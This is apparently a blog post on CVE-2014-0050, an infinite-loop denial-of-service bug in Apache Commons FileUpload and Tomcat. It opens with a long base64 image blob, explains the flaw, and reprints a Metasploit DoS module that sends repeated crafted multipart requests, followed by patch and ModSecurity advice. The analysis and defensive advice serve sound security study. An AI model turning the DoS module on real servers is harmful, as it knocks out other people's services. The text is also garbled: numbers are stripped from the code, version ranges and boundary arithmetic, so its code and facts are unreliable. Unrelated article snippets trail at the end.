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92C3WTJQ+6J95kUdFp9GSbN8ztHTMVrVtc2KS1q5Efn1dvupjHu3661k1f0dnltf582T7N6jnf2LiIh8PopMRaYiM5rzM4rMaaZ+15Lfd2vP3XB/V618d3prm80nc/j9FRFZm+nqzdM/rl+IjcvXe+wtGnR/fQVPuMWjtD1SGSgautug+GWl2eJ1Uo0NR8mnGs0kL0SSamDVKMM1z5flPtdbSXJ1wzdMNMO174RVk6zcERERkftnWP61z/f5U29YNiSFRDJQNHS3QfHLSrPF652lxeeLruIowzXPl+U+11tJcnXDN0w0w7XvhFWTrNyRPZ3n17t4HY1eXKv2znYPtvd37dtvOL2oWXfOq5ZRROSMTFdvnv5x/UJsWbtC0fD+btQsf/YUHwlTI5peMtzmJ1z7ujLc8ALXnjuc8LDaWztK0sPa8uKS660kubpKxTbss7IyqyZZuSMiIiI3jyIz6lCRqciszLDSeO0kK3dkT+fF652PW1mZ4hujONbat9/+3/sblktE5LxMV2+e/nH9QmxfwdGndveRUCyJioVR0v7z1e2qJ2ulLtlz7rA4W1uiHVvdXnW93ZJreLvzGRarvfrV1euhbdXtqiFEREQ+H0Vmcc6KzPtcryKzPkTxN0J33KPOrdzf+RWtWvl8Afevc9KhiMhJma7ePP3j+oU4d5VnoiOL48mRaIhX/JyLhp5/Nxq6exX5heRDdBcnX5Z8MvlaTT3dlXk1D+zoKqKek3Fvdb3dEYtv3XahojknM4zewElXw+lN8T1KlrSyCCIiIrdN+6ROnt2VQqI7xGv2pO6WFu3QbeGRPIW7zZIToyG6i5MvSz6ZfK2mnu7KvH6WOslVRD0n497qersjFt+67UJFc05mGL2Bk66G05vie5QsabH/+rK0I3bHPerc9svKzCsLmDerzzm64yIi58UWquzK855ba6/oS1dgz7R3XnJen31yYb/03omIiPyGPO8xrcg8+5J/T5G52G08+3LumV974SJyYWyhyvZEdcnvyTeuwJ4Jf+Z6nzGEiIiIbM43llhWQJH5mSE+uWIiIjKPLVQRERERERERERGRMLZQRURERERERERERMLYQhUREREREREREREJYwtVREREREREREREJIwtVBERERF5Zv7v/xUREREROSC2UEVERETkmbm81BYRERGRZ8QWqoickmmaLp+DiIj8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" alt="" />

The fixed code has an extra "if" condition (line number 330) that validates the length of the multipart boundary to be shorter than 4091 characters, raising an exception if that's not the case. The calculation is as follows:

boundary.length > bufSize –  – BOUNDARY_PREFIX.length =  –  –  =
//parts of the code were copied into the org.apache.tomcat.util.http.fileupload package in Apache Tomcat, causing it to be affected.

0x2: Creating the exploit

So let's get Apache Tomcat installed and try to send more than 4091 characters in the boundary field to the Apache Tomcat Manager application. Such a request might look like this:

0x3: Why is this happening

While parsing the multipart message, the following "for" loop is used by the MultipartStream class:

The innocent-looking "for" loop above is an endless loop. It is "family related" to the famous "while(true)" loop. The developer's intention was to exit this loop either by raising an exception (line 1003) or by returning a value (line 1014), unfortunately when the boundary is longer than 4091 characters (as explained earlier) and the body is longer than 4096 characters (so it can potentially contain the boundary), neither would ever occur

Relevant Link:

https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2014-0050--Exploit-with-Boundaries,-Loops-without-Boundaries/

3. POC

0x1: Metasploit

msf > use auxiliary/dos/http/apache_commons_fileupload_dos
msf auxiliary(apache_commons_fileupload_dos) > show actions
...actions...
msf auxiliary(apache_commons_fileupload_dos) > set ACTION <action-name>
msf auxiliary(apache_commons_fileupload_dos) > show options
...show and set options...
msf auxiliary(apache_commons_fileupload_dos) > run

0x2: apache_commons_fileupload_dos.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
## require 'msf/core' class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Dos def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Commons FileUpload and Apache Tomcat DoS',
'Description' => %q{
This module triggers an infinite loop in Apache Commons FileUpload 1.0
through 1.3 via a specially crafted Content-Type header.
Apache Tomcat and Apache Tomcat use a copy of FileUpload to handle
mime-multipart requests, therefore, Apache Tomcat 7.0. through 7.0.
and 8.0.-RC1 through 8.0. are affected by this issue. Tomcat also
uses Commons FileUpload as part of the Manager application.
},
'Author' =>
[
'Unknown', # This issue was reported to the Apache Software Foundation and accidentally made public.
'ribeirux' # metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-0050'],
['URL', 'http://tomcat.apache.org/security-8.html'],
['URL', 'http://tomcat.apache.org/security-7.html']
],
'DisclosureDate' => 'Feb 6 2014'
)) register_options(
[
Opt::RPORT(),
OptString.new('TARGETURI', [ true, "The request URI", '/']),
OptInt.new('RLIMIT', [ true, "Number of requests to send",])
], self.class)
end def run
boundary = ""*
opts = {
'method' => "POST",
'uri' => normalize_uri(target_uri.to_s),
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => "#{boundary}00000",
'headers' => {
'Accept' => '*/*'
}
} # XXX: There is rarely, if ever, a need for a 'for' loop in Ruby
# This should be rewritten with .upto() or Enumerable#each or
# something
for x in ..datastore['RLIMIT']
print_status("Sending request #{x} to #{peer}")
begin
c = connect
r = c.request_cgi(opts)
c.send_request(r)
# Don't wait for a response
rescue ::Rex::ConnectionError => exception
print_error("#{peer} - Unable to connect: '#{exception.message}'")
return
ensure
disconnect(c) if c
end
end
end
end

Relevant Link:

https://www.rapid7.com/db/modules/auxiliary/dos/http/apache_commons_fileupload_dos
https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb

4. Solution

0x1: Defend yourself

. Once available, update your software to one of the following versions:
Apache Commons FileUpload 1.3.
Apache Tomcat 7.0.
Apache Tomcat 8.0. . You may choose to apply the appropriate patch:
Apache Commons FileUpload: http://svn.apache.org/r1565143
Apache Tomcat : http://svn.apache.org/r1565163
Apache Tomcat : http://svn.apache.org/r1565169

0x2: ModSecurity Commercial Rule Set

SecRule REQUEST_HEADERS:Content-Type "@rx .{4000}"

Relevant Link:

http://tomcat.apache.org/security-7.html

Copyright (c) 2015 Little5ann All rights reserved

CVE-2014-0050: Exploit with Boundaries, Loops without Boundaries、Apache Commons FileUpload and Apache Tomcat DoS的更多相关文章

  1. <2014 08 29> MATLAB的软件结构与模块、工具箱简示

    MATLAB的系统结构:三个层次.九个部分 ----------------------------------- 一.基础层 是整个系统的基础,核心内容是MATLAB部分. 1.软件主包MATLAB ...

  2. 2014.1.21 DNS大事故(dns原理、网络封锁原理)

    1.21那天发生了什么,由1.21联想补充……  很多网站都上不去,域名解析都到了65.49.2.178这个IP地址 先科普,再深挖  dns查询类型 递归查询,迭代查询   DNS解析过程,这里使用 ...

  3. 小白日记15:kali渗透测试之弱点扫描-漏扫三招、漏洞管理、CVE、CVSS、NVD

    发现漏洞 弱点发现方法: 1.基于端口服务扫描结果版本信息,比对其是否为最新版本,若不是则去其 官网查看其补丁列表,然后去逐个尝试,但是此法弊端很大,因为各种端口应用比较多,造成耗时大. 2.搜索已公 ...

  4. fastjson反序列化漏洞原理及利用

    重要漏洞利用poc及版本 我是从github上的参考中直接copy的exp,这个类就是要注入的类 import java.lang.Runtime; import java.lang.Process; ...

  5. J2EE项目开发中常用到的公共方法

    在项目IDCM中涉及到多种工单,包括有:服务器|网络设备上下架工单.服务器|网络设备重启工单.服务器光纤网线更换工单.网络设备撤线布线工单.服务器|网络设备替换工单.服务器|网络设备RMA工单.通用原 ...

  6. J2EE相关总结

    Java Commons The Java™ Tutorials: http://docs.oracle.com/javase/tutorial/index.html Java Platform, E ...

  7. DatagramChannel

    DatagramChannel 最后一个socket通道是DatagramChannel.正如SocketChannel对应Socket,ServerSocketChannel对应ServerSock ...

  8. Servlet实现文件上传

    一.Servlet实现文件上传,需要添加第三方提供的jar包 下载地址: 1) commons-fileupload-1.2.2-bin.zip      :   点击打开链接 2) commons- ...

  9. 使用jetty和mongodb实现简易网盘接口

    依赖库: 1,jetty(提供http方式接口) 2,mongodb的java驱动(访问mongodb存取文件) 3,thumbnailator包,进行缩略图生成 4,commons-fileuplo ...

随机推荐

  1. Linux Linux程序练习十四(多进程压力测试)

    /* * 题目: * 编程一个基本多进程测试框架,提示用户输入进程数.和每个进程数运行圈数.(fork) * 进行多进程压力测试.(execve) * 要求父进程能监控所有子进程的退出,避免僵尸进程. ...

  2. Linux 信号详解六(可靠信号与不可靠信号)

    #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h&g ...

  3. VMware Fusion DHCP方式下如何指定虚拟机IP地址

    默认情况下,vmware fusion中的虚拟机,网卡设置成dhcp(动态分配 )时,会分配一个IP地址,但这个IP通常很难记,如果我们想为某台虚拟机挑一个好记的IP地址,可以按如下步骤操作: 命令行 ...

  4. 【转】CSS Sprites教程大全(使用方法、工具介绍)

    什么是CSS Sprite CSS Sprite 又叫CSS精灵,是目前大型网站中经常运用的图片处理方式.它的原理很简单,将网站上零散的小图片(或图标)整合在一张大图上,再用CSS中“backgrou ...

  5. 高性能JavaScript 加载和执行

    前言 本章主要讲述如何加载脚本使得用户能有良好的用户体验,而核心内容就是JavaScript的异步加载.之前写过一篇不得不说的JavaScript异步加载,相似的内容就不多加描述,讲些不同的东西,主要 ...

  6. [PGM] I-map和D-separation

    之前在概率图模型对概率图模型做了简要的介绍.此处介绍有向图模型中几个常常提到的概念,之前参考的多为英文资料,本文参考的是<概率图模型-原理与技术的>中译版本.很新的书,纸质很好,翻译没有很 ...

  7. mvc5+ef6+Bootstrap 项目心得--创立之初

    1.mvc5+ef6+Bootstrap 项目心得--创立之初 2.mvc5+ef6+Bootstrap 项目心得--身份验证和权限管理 3.mvc5+ef6+Bootstrap 项目心得--WebG ...

  8. 网站集成QQ登录功能

    最近在做一个项目时,客户要求网站能够集成QQ登录的功能,以前没做过这方面的开发,于是去QQ的开放平台官网研究了一下相关资料,经过自己的艰苦探索,终于实现了集成QQ登录的功能,现在把相关的开发经验总结一 ...

  9. UWP 快速的Master/Detail实现

    最近在写快报(还没有写完)的过程中,一开始就遇到了这个Master/Detail如何实现的问题. 微软给出Demo并不符合要求,搜索后找到了今日头条开发者写的一篇 :实现Master/Detail布局 ...

  10. Bootstrap系列 -- 8. 代码显示

    一. Bootstrap中的代码块 代码块一般在博客中使用的较多,比较博客园中提供的贴代码. 在Bootstrap中提供了三种形式的代码显示 1. 使用<code></code> ...